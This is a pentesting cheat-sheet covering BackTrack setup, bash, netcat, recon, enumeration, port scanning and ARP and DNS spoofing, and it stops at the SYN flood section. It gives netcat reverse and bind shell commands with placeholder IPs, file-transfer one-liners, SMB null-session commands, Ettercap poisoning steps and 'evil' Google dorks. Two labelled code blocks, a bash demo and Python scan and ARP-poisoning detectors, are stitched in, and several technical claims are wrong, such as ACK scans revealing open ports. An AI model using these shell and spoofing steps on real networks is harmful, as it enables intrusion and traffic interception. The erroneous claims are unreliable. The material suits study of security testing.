OSCP Hacking techniques, Kali Linux, commands, etc...
Contents
Introduction
BackTrack Basics
XWindow
Set IP Through DHCP
Set Static IP
Start SSH Service
Start Apache Service
Start TFTP Service
Starting VNC Service
Checking Open Ports
Bash Basics
Commands
Special Characters
Asterisk
Question Mark
Arrows
Double Arrows
Pipe
Grep
Cut
Sort
Scripting
Netcat
Netcat Client Connection
Netcat Server Connection
Bind Shells
Reverse Shells
Netcat vs. nc.traditional
Wireshark
Using
The TCP “3-Way Handshake” (Getting a Website)
Filters
Password Grabbing
Reconnaissance
Google
Google Symbols
Quotes
Asterisk
Minus
Google Operators
intitle
inurl
site
cache
“Evil” Google Searches
Google Dorks
Service Enumeration
Whois Enumeration
DNS Server Enumeration
Host Lookup
Reverse Host Lookup
DNS Zone Transfers
SNMP Enumeration
SMTP Enumeration
OS Fingerprinting
NetBIOS Enumeration
Active Directory Enumeration
SMB Enumeration
Windows Null Sessions
enum4linux
smb-enum-users
smb-enum-shares
Maltego
Port Scanning
Theory
Types
Problems
Ping Assumptions
UDP Scans Problems
nmap
NSE
zenmap
Unicorn Scan
autoscan
ARP Spoofing
Theory
Limitations
Ettercap
DNS Spoofing
SSLStrip
OS Vulnerabilities
Vulnerability Assessment
Web Server Vulnerabilities
Database Vulnerabilities
TCP Stack Vulnerabilities
Application Vulnerabilities
Denial of Service
Theory
Flood Attacks
Syn Flood
Mitigation for SYN Floods
UDP Flood
Mitigation for UDP Floods
ICMP Flood
Mitigation for ICMP Floods
Smurf Attack
Mitigation for Smurf Attacks
Ping Of Death
Teardrop
LOIC
SSL DoS
Exploits
Compiling
Resources
Remote Administration Tools
Theory
Uses
Darkcomet
CyberGate
Solitude
Cerberus
Blackshades
Metasploit
msfconsole
msfcli
msfweb
msfgui
Updating Metasploit
Exploitation
Payloads
Meterpreter
Encoders
Auxiliary
Credential Collection
db_autopwn
Browser Autopwn
Anti-virus Bypass
Theory
Droppers
Theory
Crypters
Theory
The Encrypter
The Stub
Antis
Junk Code
Buffer Overflows
Theory
Protections
Common Attacks
Problems
Fuzzers
Web Based Attacks
Zero Frames and Zero Images
Command Execution
Cross Site Request Forgery
File Inclusion
Local
Remote
SQL Injections
URL
Authentication Bypass
Blind
SQLmap
Cross Site Scripting (XSS)
Non-Persistent
Persistent
Web Based Exploitation Frameworks
OWASP Mantra
Port Tunneling
Theory
HTTP CONNECT Tunneling
SSL Tunneling
stunnel
SOCKS
SSH Tunneling
Local
Remote
Dynamic
Tor
Theory
Installing
Using
Authentication Vulnerabilities
Theory
Problems With Networks
Plain Text
Hashing Systems
MD4
DES
MD5
SHA1
NTLM
MYSQL
Challenge Systems
Uneven Algorithms
Here Be Dragons
Password Attacks
Theory
Strong Vs. Weak Passwords
Brute Force
Dictionary
Rainbow Tables
GPU Cracking
Misconceptions
hydra
xhydra
medusa
ncrack
Wireless Attacks
Theory
WEP
WEP Cracking
Cafe Latte
ARP Replay
Korek's Chop Chop Attack
Hirte Attack
Fragmentation Attack
WPA
WPA Cracking
WPA2
WPA2 Cracking
WPS
WPS Cracking
Wash
Reaver
DoS Attacks
Deauthentication Attacks
Man In The Middle
Social Engineering
Introduction
This resource is a collection of notes that I took over the past year relating to the subject of computer security. This note collection will not teach you by itself. It is meant to be more of a refresher, guide, and quick resource to help people learn.
To use this please install BackTrack. Most of the tools are already installed and will make your life a whole lot easier.
I would also suggest brushing up on your Linux skills as they will be used heavily in this.
If you like this document, please help support the author and donate to him. The author needs to eat too. If you have any questions, my contacts are as follows.
Email – napalmfire.df@gmail.com
Skype – napalmfiredf
BackTrack Basics
BackTrack normally starts in command line mode.
The default log-in is
• User: root
• Pass: toor
XWindow
To begin using BackTrack we must start the GUI.
• startx
This starts KDE or GNOME depending on the version. Not all tools are GUI based, so use Konsole (the terminal) to run them. The /pentest/ directory holds all the tools you will need.
Set IP Through DHCP
• dhcpcd [interface]
However, on a new BT4 installation you must first install dhcpcd with apt-get install dhcpcd.
Set Static IP
• ifconfig [interface] [ip]/24
• route add default gw [gateway]
• echo nameserver [gateway] > /etc/resolv.conf
Start SSH Service
Go to Start → Services → SSH → Setup SSH
This will generate SSH keys and start service.
SSH port is 22.
• service ssh start
Start Apache Service
Go to Start → Services → HTTPD → Start HTTPD
HTTPD port is 80
• service httpd start
Start TFTP Service
• tftpd --daemon --port 69 /tmp/
or Start → Services → TFTP → Start TFTP - TFTP port is 69
Starting VNC Service
• vncserver
or Start → Services → VNC → Start VNC
VNC port is 5901 (Add +1 to port for every new connection)
Checking Open Ports
• netstat -ant | grep [port]
netstat lists the open ports on the host and grep filters the results down to the port you asked for.
Bash Basics
BASH, the Bourne Again Shell, is the command-line shell on which most Linux systems operate. It lets us pass commands directly to the OS, giving us greater control and access.
Commands
The basic structure of a command:
• command argument argument argument
Here the program named command is run and each argument is passed to it. A command is the program being run; an argument is the data the user wishes to pass to that program. Not all programs need to receive data; some perform one-shot functions.
An example of a useful command:
• cat emails.txt
This runs the program “cat” and tells it to open emails.txt.
Another thing to be aware of is switches. Switches usually have a “-” or “--” in front. They tell the program to operate in a certain way, or mark a specific field of input.
Consider:
• nmap -sV -sS 192.168.0.1
This line runs the program “nmap” and tells it to use the -sV and -sS options against the IP 192.168.0.1.
Another example:
• cut -d" " -f3 emails.txt
This invokes the program “cut” and tells it to use the -d switch with a space (" ") as its argument. It also tells it to use -f with “3” as the argument.
Special Characters
Certain characters have special meanings in BASH and are very useful to us when dealing with large amounts of data.
Asterisk
The asterisk is a wildcard that expands to every file name matching the pattern around it. For instance, consider this directory listing.
• email-jodie.txt
• email-sam.txt
• email-unwanted.pdf
• junk.txt
• morejunk.txt
Let's say we want to cat all the text files with email in the name. We could go through and cat them one by one, but that would take too long. So instead we use the asterisk to fill in all possibilities.
• cat email*
While this would cat the files we did want, it will also cat email-unwanted.pdf because it matches the pattern too. Let's try again, this time limiting it only to text files.
• cat email*.txt
This would cat only the files we want, ensuring no extra worthless data gets into our search.
Alternatively, an even easier way to do this would be to use:
• cat e*.txt
This would do the exact same thing, in far fewer characters.
Question Mark
Similar to the asterisk, however, limited to one character.
Consider this directory listing:
cats1.txt
cats2.txt
cats3.txt
cats1-backup.txt
cats2-backup.txt
cats3-backup.txt
Our goal is to cat all the files that aren't backups. If we used the star here, it would return all the files, so instead we use a question mark, which matches exactly one character in that position.
• cat cats?.txt
Arrows
Arrows, sometimes referred to as tacs, are used to write command output to a file or read a file into a command. For example, let's say you wish to save the output of a program into a file. You can use the arrow to write that output directly to it, making your life easier.
• nmap 192.168.0.1 > file.txt
Here we take the output of nmap and stuff it into file.txt, allowing us to save the results of our scan. When doing this, if the file previously existed, it erases all the data in the file before adding the new data.
We can also read input from files.
• cut -d" " -f3 < ip.txt
This would send the contents of ip.txt into the cut program.
Double Arrows
Double arrows, sometimes referred to as tac-tacs, are used to add data to an already existing file.
For example, let's say you wanted to add the result of a new nmap scan to a file you already created.
• nmap 192.168.0.1 >> file.txt
This appends to the file instead of overwriting it.
Pipe
The pipe is an extremely useful character, particularly for text manipulation. Pipe takes the output of one program and uses it as the input for another.
For example:
• nmap 192.168.0.1 | grep "smb"
This runs nmap and then sends its output to grep to use how it pleases. This is useful for handling huge amounts of text (as we will see later when talking about cut and sort).
Grep
Grep is a program that will search text for a specific pattern, and then output only the lines which contain the pattern.
For instance, let's say we have a large configuration file and we need to find the value of one option. Using grep, we can search the configuration file for that text and have it display only the matching line.
• cat long.conf | grep "hard-to-find-value"
Cut
Cut is a program that is used to split text based on a delimiter. This allows us to quickly get text that might be several characters deep.
For example, examine this set of text.
id:user:password:email
1:admin:secret:admin@admin.com
Say we only want all the usernames, we could use : as a delimiter, and specify what field we want to get, which, in this example, would be two.
• cut -d':' -f2
This will output:
user
admin
Sort
Sort allows us to sort text, but it also has a handy feature that removes duplicate lines.
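An added example (not from the original notes) that combines the features above: the ? wildcard from the Question Mark section, the > and >> redirects, and a grep | cut | sort pipeline over a constructed credential dump in the id:user:password:email layout. File names and contents are made up for the demo.

```shell
#!/bin/sh
# Added example: BASH wildcards, redirects and pipes on constructed sample data.
set -e

WORK=$(mktemp -d)

# Recreate the directory listing from the Question Mark section.
for n in 1 2 3; do
  printf 'cat number %s\n' "$n" > "$WORK/cats$n.txt"
  printf 'old backup %s\n' "$n" > "$WORK/cats$n-backup.txt"
done

# '?' matches exactly one character, so the -backup files are skipped;
# 'cats*.txt' would have matched all six.
list_non_backups() {
  ( cd "$WORK" && ls cats?.txt )
}

# Constructed dump in the id:user:password:email layout from the Cut section,
# with a duplicate row so sort -u has something to remove.
printf '%s\n' \
  'id:user:password:email' \
  '1:admin:secret:admin@admin.com' \
  '2:jodie:hunter2:jodie@example.com' \
  '3:admin:secret:admin@admin.com' \
  '4:sam:letmein:sam@example.com' > "$WORK/dump.txt"

# grep -v drops the header row, cut takes field 2 (the username) using ':'
# as the delimiter, and sort -u sorts while removing duplicates.
unique_users() {
  grep -v '^id:' "$1" | cut -d':' -f2 | sort -u
}

# '>' truncates the file, '>>' appends: two scans' output end up in one file.
# Returns the number of lines kept.
collect_hosts() {
  out="$WORK/hosts.txt"
  echo 'scan one: 192.168.0.1' > "$out"    # creates or overwrites
  echo 'scan two: 192.168.0.2' >> "$out"   # appends to the existing file
  grep -c 'scan' "$out"
}

list_non_backups
unique_users "$WORK/dump.txt"
collect_hosts
```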
Scripting
Netcat
Netcat – A tool used to write data directly to a TCP/UDP port. Can be in client mode or server mode.
Netcat Client Connection
This mode sets Netcat to client mode. This connects to a server through a port defined as an argument. This allows the client to receive and transmit data to the server.
• nc -v [ip] [port]
Netcat Server Connection
This mode sets Netcat to server mode. This allows clients to connect to that port and receive and transmit raw data.
• nc -lvvp [port]
Sending a File
• nc -vv [ip] [port] < [file]
Receiving a File
• nc -lvvp [port] > [file]
Bind Shells
Netcat has the ability to redirect the input and output of a console to a TCP/UDP port. This can allow remote administration. This is called a bind shell. This then allows a server to broadcast its shell to others.
Server
• nc -lvvp [port] -e [shell]
As a note, Linux's shell is located at /bin/bash while Windows's shell is cmd.exe.
Client
• nc -v [ip] [port]
Now the shell is transmitted to the client when it connects to the server.
Reverse Shells
This works the reverse of a bind shell. This allows the client to transmit their shell to a server. This has the same effect as the bind shell.
Server
• nc -lvvp [port]
Client
• nc -v [ip] [port] -e [shell]
Netcat vs. nc.traditional
In some Linux environments, nc might already be installed. However, this is often a different implementation from the traditional netcat. To get the traditional version, use
• apt-get install nc.traditional
You will then have to replace nc with nc.traditional in the commands above.
Wireshark
Wireshark is a packet sniffer which can capture packets and display the contents of them.
Using
• wireshark &
This runs Wireshark in the background so the console stays usable.
Once loaded, it is simple to use. Just select the interface you'd like to listen in on. Once in listening mode, Wireshark will capture all incoming packets on that interface.
The TCP “3-Way Handshake” (Getting a Website)
Wireshark displays packets in capture order, with the most recently captured packet last; the list grows downward. Here we can see a sample capture of the process of making a connection and getting a webpage through HTTP.
# | Source  | Destination | Protocol | Info                         | Description
1 | You     | Gateway     | DNS      | Standard query of host       | You ask the gateway where the host is.
2 | Gateway | You         | DNS      | Standard query response [ip] | Gateway tells you the IP address.
3 | You     | Host        | TCP      | SYN                          | 1st part of the 3-way handshake.
4 | Host    | You         | TCP      | SYN, ACK                     | 2nd part of the 3-way handshake.
5 | You     | Host        | TCP      | ACK                          | 3rd part of the 3-way handshake.
6 | You     | Host        | HTTP     | GET / HTTP                   | Beginning of sending the webpage.
Filters
Filters let you exclude packets based on search patterns. For instance, let's say you'd like to only see traffic on port 1234. Filters let you exclude anything that isn't on that port.
• tcp.port==1234
Filters also support Boolean logic. For instance, let's say you'd like to see traffic on both port 1234 and port 4321.
• tcp.port==1234 || tcp.port==4321
This displays traffic on either port. A single packet can only use both ports at once if one is its source and the other its destination, so joining the two tests with && would hide almost everything.
Password Grabbing
Reconnaissance
More info = Higher chance of success
Passive Reconnaissance – Stealthily gathering information in a non-intrusive way. There is little to no chance of being caught.
Active Reconnaissance – Gathering information in a way that is intrusive and may be detected by an IDS. There is a medium to high risk of detection.
Look for:
• Names
• Numbers
• Emails
• Addresses
• Affiliates
• Links
• IP addresses
• Nameservers
• Site Maps
Google
Google crawls a huge number of web sites, often crawling through poorly configured webservers. Using specific search terms we can find things out about those webservers, or increase our attack surface through the information gathered here.
Some examples would be:
• Possible SQL injections
• Possible XSS attacks
• Webmail logins
• SQL Dumps
• Administration pages
• Web backdoors
• Misconfigured web applications
Google Symbols
Google symbols let us refine our search options, letting us quickly and efficiently get the data we need.
Quotes
• “search terms”
Putting a term in quotes only displays pages with that sequence of text. This is opposed to no quotes which will display all pages containing part or all of the text, regardless of sequence.
Asterisk
• * birds
The asterisk will fill in all possible terms for a sequence. For instance, the asterisk here will fill in all the different types of birds and much more, in an attempt to find your term.
Minus
• blue foot boobies -porn
The minus excludes pages containing a specified term. For example, this search excludes any page with the term porn on it, which Google would otherwise include because it displays all pages containing boobies.
Google Operators
Google has many operators that can help us narrow our search results. Many of them will scour pages looking for the exact information we need, others can restrict data to certain types.
intitle
The intitle operator restricts search results to only pages that contain a pattern in the title. For example:
• intitle:”National Geographic” Africa
The above will display results from pages that have National Geographic in the title and also have Africa on the page. This is useful for finding admin pages, as well as file indexes.
inurl
The inurl operator restricts results to pages whose URL contains the search term. Using this we can often find potentially vulnerable pages or specific admin login pages.
• inurl:admin.php login
site
The site operator restricts results to a specific domain. This allows us to narrow our search to a specific target.
• site:vulnerable.com inurl:admin.php login
cache
The cache operator lets us see the last version of a webpage crawled by Google. By using this we can often find results of a webpage that were deleted some time ago.
• cache:google.com
“Evil” Google Searches
I will only cover a few here, since the topic has almost endless searches. The idea of “evil” Google searches is to find pages that are vulnerable, have default passwords, or find caches of information.
These searches allow an attacker to search specific websites for vulnerabilities.
For example:
Let's look for default XAMPP installs.
Google Dorks
Service Enumeration
Service Enumeration is the technique of looking for open information about a target's ISP, nameservers, IP addresses, and running protocols.
Whois Enumeration
• whois [url/ip]
Gives:
• Web server admin
• Numbers
• Emails
• Nameservers
DNS Server Enumeration
• nslookup
Begins DNS Lookup
• >[website]
Gives DNS info on specified domain
• >set type=mx
Gives Mail Exchange servers
• >set type=ms
Gives mail server IPs.
Host Lookup
Use this to get an IP address for a domain.
• host [url]
You can also use the -t switch to specify type of server.
Look up nameservers for a specified host.
• host -t ns [url]
Look up mail exchange for a specified host.
• host -t mx [url]
Reverse Host Lookup
This lets you take an IP and reverse it into a domain. Using this we can often find out which domains are attached to a given IP address.
• host [ip]
DNS Zone Transfers
DNS zone transfers are a problem on misconfigured DNS servers that allow zone transfer requests from any host. With this, an attacker can get the layout of an entire external network handed to them just by asking for a copy of the zone record.
We can perform this check using host. We first need a list of the target's nameservers, which nslookup (or host -t ns) can provide.
• host -l [victim domain] [nameserver]
This asks the given nameserver for a full zone transfer of the domain. If successful, it returns every name-to-IP mapping in the zone, exposing hidden subdomains to us.
This kind of attack will not always succeed, and servers can easily be configured to refuse or detect it.
SNMP Enumeration
Simple Network Management Protocol is a UDP based protocol used to monitor network-attached devices. Its authentication is a community string, of which there is normally a public (read-only) one and a private (read-write) one. The public community may not have all permissions; however, read access is all that is needed to enumerate. The public community string is usually “public”.
• Weak authentication system.
• Vulnerable to IP-spoofing.
To begin using SNMP use the following command.
• snmpwalk -c [key] -v1 [ip] 1
SMTP Enumeration
Simple Mail Transfer Protocol handles outgoing email.
Checks whether a user is valid (issued inside an SMTP session).
• vrfy [user]
OS Fingerprinting
OS Fingerprinting – The process of scanning open ports and grabbing banners to detect the operating system.
Once you know the OS you can figure out which exploits apply. Nmap provides free OS detection.
• nmap -O [ip]
NetBIOS Enumeration
NetBIOS – Network Basic Input Output System is a largely forgotten technology that runs by default on most Windows computers. It provided early name resolution. That task is now more commonly handled by DNS, but NetBIOS still runs as a default service on most Windows computers.
NBTScan – Free NetBIOS scanner.
Active Directory Enumeration
Active Directory - Contains records of users, servers, sites, and workgroups.
Every account on the system has read permissions. It uses LDAP. Ldp.exe is commonly used to control AD. You can possibly authenticate with a Guest or null account.
It would only take one compromise to get all the AD info.
SMB Enumeration
SMB enumeration is extremely useful as Windows runs SMB as a default service. We can use it to find a list of users (making password cracking easier), mount remote shares, and even run executables through it.
Windows Null Sessions
A Windows null session is the ability to log in to a Windows computer through SMB with an empty username and password and view information about the computer. You can then mount shares from it.
To use it you must use the command line in Windows (share below is the target's hostname or IP).
• net use \\share\ipc$ "" /user:""
If the command is successful, the net view command can be used to view information about the computer such as users, processes, services, and uptime.
You may also be able to gain C: drive access by going to Run → \\share\c$
enum4linux
enum4linux is a tool based on a Windows tool called enum.exe. It carries many of the same features and is extremely comprehensive in its output.
smb-enum-users
This script lets us enumerate the users on a remote Windows computer. This script is very similar to enum.exe for Windows.
• nmap -sS -sU --script smb-enum-users.nse -p U:137,T:139,445 [host]
WARNING! This script has two options lsaonly and samronly. samronly REQUIRES a real user account, not just guest. lsaonly requires only a guest account.
smb-enum-shares
This script lets us enumerate the shares of a remote windows computer.
Maltego
Port Scanning
Theory
Port Scanning – The technique of scanning for open ports to ascertain information about a target computer. It is the first action to take before attempting exploitation and is part of the information gathering phase. It can be intrusive and detected by an IDS.
Packets – Information sent over the network in smaller chunks. Uses flags to indicate the type of packet. Flags can be mixed.
Types
Type | Meaning
SYN  | Initial packet (begins the handshake)
ACK  | Acknowledgment (reply for a packet received)
FIN  | Finish (done with the connection)
URG  | Urgent
PSH  | Push
RST  | Reset (sent to reset the TCP handshake)
TCP – A connection-oriented protocol that uses a 3-way handshake before data transfer; completing it is how open ports are identified.
UDP – A stateless protocol. If the port is open there is no reply. If it is closed you get an ICMP port unreachable message.
Full Scan - Completes 3-way handshake. Is intrusive and easily detected but, reliable.
Half Scan/SYN Scan – Sends only syn packets and does not complete the handshake. This makes it harder to detect.
UDP Scan – Scans UDP ports. However it is unreliable because UDP is stateless. If the port is up there is no reply. If it is down source receives an ICMP unreachable.
Stealth Scan – Uses same method as syn scan but varies the frequency and timing and randomizes the ports scanned making it harder to detect.
Xmas Scan – Creates a malformed packet with PSH, FIN, and URG flags to scan a system. Doesn't work against Windows.
Ack Scan – Scanner sends ACK packets and receives a RST packet back. This shows the attacker which ports are open.
ICMP Scan – Very detectable ping scan. Rarely used because it is unreliable, inefficient ,and detectable.
Problems
Port scans are often noisy and dangerous; running one can make you an easy target for an IDS or firewall logging system.
Ping Assumptions
In most cases, unless told not to, scanners will attempt to ping the host before attempting a port scan. If they don't get a ping back the host is considered "not alive". This is a false assumption in some cases and can produce faulty scan results, telling you that computers are not alive when they actually are and are just not responding to ping probes.
UDP Scans Problems
Since UDP scans are stateless, there can be issues with the detection process. For example, a firewall can be blocking probes to certain ports and you'll never know.
It could also allow the data through but drop the ICMP Unreachable packet on its way out.
As a result, take UDP scans with a grain of salt; chances are you aren't seeing the full picture.
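The flip side of the "port scans are noisy" point above is how a firewall log reveals one. This added example (not from the original notes) parses constructed firewall log lines in a made-up "timestamp ACTION PROTO src:port -> dst:port" format and flags any source that touches many distinct ports on one host inside a short window, which is exactly the pattern a full, SYN, or UDP scan leaves behind; the log format, hosts and thresholds are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall log (not from any real device): one noisy source walks 12 ports
# on the same host within 25 s, one host reconnects to port 443 many times, one touches
# a handful of ports, plus a malformed line the parser must skip.
_BASE = datetime(2024, 5, 1, 10, 0, 0)
SAMPLE_LOG = (
    [f"{(_BASE + timedelta(seconds=2 * i)).isoformat()} DROP TCP 203.0.113.9:{40000 + i} -> 192.0.2.10:{20 + i}"
     for i in range(12)]
    + [f"{(_BASE + timedelta(seconds=8 * i)).isoformat()} ACCEPT TCP 198.51.100.4:{50000 + i} -> 192.0.2.10:443"
       for i in range(15)]
    + [f"{(_BASE + timedelta(seconds=5 * i)).isoformat()} DROP UDP 198.51.100.5:{60000 + i} -> 192.0.2.10:{161 + i}"
       for i in range(4)]
    + ["garbage line that does not match the format"]
)

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ACCEPT|DROP) (?P<proto>TCP|UDP) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "src": m["src"],
        "dst": m["dst"],
        "dport": int(m["dport"]),
        "proto": m["proto"],
        "action": m["action"],
    }


def detect_port_scans(lines, threshold=10, window_seconds=60):
    """Flag (src, dst) pairs where src touched >= threshold distinct ports on dst
    within some window_seconds-long window. Returns {(src, dst): set_of_ports}."""
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["ts"])
    hits = defaultdict(list)  # (src, dst) -> [(ts, dport)] in time order
    for e in events:
        hits[(e["src"], e["dst"])].append((e["ts"], e["dport"]))

    alerts = {}
    for pair, seq in hits.items():
        start = 0
        for end in range(len(seq)):
            # Slide the window start forward until it spans at most window_seconds.
            while (seq[end][0] - seq[start][0]).total_seconds() > window_seconds:
                start += 1
            ports = {p for _, p in seq[start:end + 1]}
            if len(ports) >= threshold:
                # Accumulate every port seen in a qualifying window for this pair.
                alerts[pair] = alerts.get(pair, set()) | ports
    return alerts


if __name__ == "__main__":
    for (src, dst), ports in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan: {src} -> {dst}, {len(ports)} distinct ports: {sorted(ports)}")
```

A host that hammers a single port (the 443 client) is not flagged, because the detector counts distinct ports rather than connection volume.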
nmap
Nmap runs a port scan on the specified IP.
• nmap -p [port] [ip]
Full port scan.
• nmap -p 1-65535 [ip]
OS detection
• nmap -O [ip]
Service versions scan
• nmap -sV [ip]
Comprehensive scan
• nmap -A [ip]
NSE
The nmap Scripting Engine is a tool which allows us to write and use scripts to aid us in our penetration testing goals. We used a script earlier in the SMB Enumeration section to attempt an enumeration of users on a system.
We can see the various .nse scripts included with nmap on their site, and we can also see them by going through the nmap scripts directory.
We can also attempt to run all scripts using this command:
• nmap --script all [ip]
zenmap
Zenmap is an nmap GUI that will allow us to easily understand the sometimes overwhelming amount of data that nmap can provide.
Unicorn Scan
A scanning tool like nmap, but with a web GUI. (See Appendix for a list of features.)
• unicornscan [ip]
autoscan
ARP Spoofing
Theory
ARP - A protocol for finding the MAC address of a host whose IP is known. It consists of a broadcast request phase, a reply phase, and a confirmation phase.
ARP cache - The table containing MAC-IP match-ups.
ARP Spoofing (APR) - The technique used to poison ARP caches. A sniffer gets ARP packets from a switch and proceeds to intercept them. It can then route all network traffic through the attacker.
1. Host-A broadcasts on all ports. ARP Request
2. Host-B receives the request and sends back a reply. ARP Reply
3. Host-A sends a confirmation to Host-B
By listening in, a sniffer could get all the MAC-IP match-ups on the network. Using this data we can reroute packets through our machine and then out to the destination.
It does this by actively listening and then modifying standard ARP packets.
Victim Packet
 | MAC | IP
Source | Attacker | Gateway
Destination | Victim | Victim
Gateway Packet
 | MAC | IP
Source | Attacker | Victim
Destination | Gateway | Gateway
Limitations
Once in the attack stage, the attacker must reroute all traffic to the appropriate destinations while still poisoning the ARP cache. There are several rules about APR attacks.
1. APR only works on LANs.
2. The attacker must reroute packets unless a DoS attack is preferred.
3. The attacker must know where to reroute packets.
4. APR will slow down the network as you are adding another layer to the network.
5. APR must update constantly. If not, the computer will delete the entries when it ARP requests an address again.
6. An APR attack cannot be done to computers connected to the main router themselves. This is because the router is able to intercept them before damage is done.
Also, APR attacks need to have some thought put into them.
1. One peer may be the Internet. If this is true you need to have the routing tables or be broadcasting.
2. There could be multiple entrances/exits on a LAN.
3. There may be anti-APR protections.
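The packet tables above show what the poison looks like on the wire: one MAC (the attacker's) answering for both the gateway's and the victim's IP, and the gateway IP changing its MAC mid-capture. This added example (not from the original notes) checks a stream of ARP replies for both symptoms, the way arpwatch-style monitors do; the record format is a constructed simplification of tcpdump's "Reply <ip> is-at <mac>" output, and every address is made up.

```python
import re
from collections import defaultdict

# Constructed ARP reply records, not a real capture, in the style of tcpdump's
# "Reply <ip> is-at <mac>" output: "<seconds> reply <sender ip> is-at <sender mac>".
SAMPLE_ARP = [
    "100 reply 192.168.1.1 is-at 00:11:22:33:44:01",   # gateway answers normally
    "101 reply 192.168.1.20 is-at 00:11:22:33:44:20",  # victim answers normally
    "102 reply 192.168.1.30 is-at 00:11:22:33:44:30",  # unrelated host
    "150 reply 192.168.1.1 is-at 00:11:22:33:44:66",   # attacker MAC claims the gateway IP
    "150 reply 192.168.1.20 is-at 00:11:22:33:44:66",  # attacker MAC claims the victim IP
    "151 reply 192.168.1.66 is-at 00:11:22:33:44:66",  # attacker's own, legitimate entry
    "200 reply 192.168.1.1 is-at 00:11:22:33:44:66",   # poison repeated to keep caches fresh
    "not an arp record",
]

ARP_RE = re.compile(
    r"^(?P<ts>\d+) reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})$",
    re.IGNORECASE,
)


def parse_arp(line):
    """Return {'ts', 'ip', 'mac'} for a reply record, or None for anything else."""
    m = ARP_RE.match(line)
    return None if m is None else {"ts": int(m["ts"]), "ip": m["ip"], "mac": m["mac"].lower()}


def detect_arp_poisoning(lines, trusted=None):
    """Return alert dicts for two poisoning symptoms:
    - an IP whose MAC differs from the first (or trusted) binding seen for it
    - one MAC answering for more than one IP (the attacker standing in for both peers)
    trusted: optional {ip: mac} baseline, e.g. the gateway's known MAC."""
    binding = {ip: mac.lower() for ip, mac in (trusted or {}).items()}  # ip -> mac
    claims = defaultdict(set)   # mac -> set of IPs it has answered for
    alerts, reported = [], set()
    for rec in filter(None, map(parse_arp, lines)):
        ip, mac = rec["ip"], rec["mac"]
        known = binding.setdefault(ip, mac)     # first sighting becomes the baseline
        if known != mac and ("changed", ip, mac) not in reported:
            reported.add(("changed", ip, mac))
            alerts.append({"kind": "ip-mac-changed", "ts": rec["ts"],
                           "ip": ip, "old": known, "new": mac})
        claims[mac].add(ip)
        # Report once each time this MAC's set of claimed IPs grows past one.
        if len(claims[mac]) > 1 and ("multi", mac, len(claims[mac])) not in reported:
            reported.add(("multi", mac, len(claims[mac])))
            alerts.append({"kind": "mac-claims-multiple-ips", "ts": rec["ts"],
                           "mac": mac, "ips": sorted(claims[mac])})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP, trusted={"192.168.1.1": "00:11:22:33:44:01"}):
        print(alert)
```

Seeding `trusted` with the gateway's real MAC means the very first spoofed reply is caught even if the monitor started after the poisoning began.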
Ettercap
Ettercap - A tool used for ARP spoofing.
Get hosts on a network
• Hosts -> Scan for hosts
• See list of Hosts
• Hosts -> Hosts lists
• Target 1 = Gateway
• Target 2 = Victim
• MITM->ARP Poisoning to begin APR.
DNS Spoofing
DNS Spoofing – The tactic of making a malicious zone transfer to create a false IP-URL match-up. This is done to send a target to a malicious website or to DoS. Example: Google.com = attacker's IP
1. Run ettercap with a unified sniffer
2. Turn on DNS spoof plugin
3. APR
4. Start sniffer
SSLStrip
SSLStrip is a Python script which, when run in conjunction with an ARP attack, abuses a technique used by many website hosts where, when someone types in a URL, the site uses a 302 redirect or an SSL element embedded on the page to move the user to HTTPS. SSLStrip strips the HTTPS out of 302 redirects and out of pages served through HTTP.
OS Vulnerabilities
All operating systems have vulnerabilities. It is a common misconception that Windows is the only OS with holes.
Exploit – A malicious piece of code which can compromise a system's security and give an attacker access to that computer. Exploits are used to penetrate and ultimately gain access to a system. They carry a broad range of payloads and can do just about anything.
Common vulnerabilities
• Application Vulnerabilities
• TCP Stack Overflows
• Default permissions
• Default security settings
The most popular, successful, and common attacks target default services, software, or processes that run on the computer. This is because the software is preinstalled and usually running by default. However, there are holes in all software and they can be taken advantage of.
Vulnerability Assessment
Vulnerabilities are security flaws in software. They are caused by poorly written code and a lack of testing. Patches fix holes. Unpatched systems are more vulnerable, so you should always update all software.
Vulnerability scanners
• Nessus
• Nikto
Security Websites
• Bugtraq
• CVE Sites
• Milw0rm
• exploit-db
Web Server Vulnerabilities
Web servers are extremely vulnerable for many reasons:
• Permanent connection to the Internet
• Most likely firewalled
• Easier to exploit due to poor security
Common vulnerabilities
• Passwords stored in plain-text or code
• Ability to traverse directories without getting 503.
• Ability to execute scripts
• Ability to bypass URL Checking and return a command prompt
• Improperly patched and configured servers.
Database Vulnerabilities
All DB systems have holes. Database servers may be local or remote. They might be behind a firewall or in a DMZ.
Common vulnerabilities
• Misconfigured permissions
• bad database objects
• SQL injection
• Default DB passwords
• Null accounts/null sa account
• Vulnerable to the application they serve
• If application is poorly written it can allow for a compromise
TCP Stack Vulnerabilities
All OSs have this class of vulnerability. It is usually exploited for DoS attacks, but it can also be used to get deeper into a network.
Common Vulnerabilities
• TCP Sequence Prediction (Session jacking)
• TCP Window Size Overflow
• Syn Flood
• APR
• DNS Poisoning (DNS Zone Transfers)
• High Volume Attacks (Ping of Death, Smurf, Teardrop, Botnets)
Smurf – Pinging a broadcast address with a spoofed source so that every responding system sends its reply to the target, causing a DoS.
Teardrop – Sending malformed packets with bad IP fragments, which causes an overflow in the TCP/IP stack and a DoS.
Application Vulnerabilities
These vulnerabilities affect almost all software. They usually stem from poor coding practices.
Common Vulnerabilities
• Buffer Overflows
• Weak Authentication
• Poor Data Validation
• Written with errors/poor error checking
Denial of Service
Theory
The idea is to force a victim to use so much RAM that the computer slows to a halt, crashes, and goes offline. DoS attacks have become very mainstream, as they often require little technical knowledge and tools are widely available.
Flood Attacks
Flood attacks are a form of DoS attack that attempts to bring a system down by flooding it with connections. This works because for every connection one makes, the computer must open up a slot in RAM for the connection. As a result, the computer can become bogged down until it crashes or stops serving new connections.
Syn Flood
